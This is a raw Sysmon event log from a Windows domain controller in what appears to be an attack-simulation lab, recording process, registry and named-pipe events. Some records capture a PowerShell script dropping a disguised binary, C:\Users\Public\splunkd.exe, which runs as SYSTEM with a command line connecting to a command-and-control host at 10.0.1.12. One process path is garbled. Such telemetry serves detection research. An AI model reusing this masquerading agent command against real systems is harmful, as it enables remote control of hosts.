12:00:54.455{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:54.393{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\GuidBinary Data 12241200x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:00:54.393{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\Guid 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.315{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.244{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.237{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:54.237{266CAFBE-646C-6064-0D00-00000000AE01}612\RpcProxy\593C:\Windows\system32\svchost.exe 13241300x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:54.237{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 17141700x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:54.221{266CAFBE-646A-6064-0B00-00000000AE01}856\77c0f17c25386996C:\Windows\system32\lsass.exe 17141700x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:54.221{266CAFBE-646A-6064-0B00-00000000AE01}856\RpcProxy\49675C:\Windows\system32\lsass.exe 10341000x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:53.205{266CAFBE-646C-6064-1200-00000000AE01}11961472C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:53.190{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.846{266CAFBE-6473-6064-2600-00000000AE01}30602196C:\Windows\system32\conhost.exe{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.830{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6473-6064-2600-00000000AE01}3060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.830{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.830{266CAFBE-646E-6064-1B00-00000000AE01}22922908兞遗膓멳觞灰쪸�혠粡陗녋玙쫕㭿⥬ɵА栠뚨WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+966df|C:\Windows\System32\shell32.dll+9656c|C:\Windows\System32\shell32.dll+962bc|C:\Windows\System32\shell32.dll+6f987|C:\Windows\System32\shell32.dll+6f8e5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+38b3fc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+af0a27|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+88e1ec9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+88e1ec9d(wow64) 154100x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.786{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 13241300x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000000) 13241300x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:51.815{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-892 11241100x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localEXE2021-03-31 12:00:51.580{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2021-03-31 11:59:34.414 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 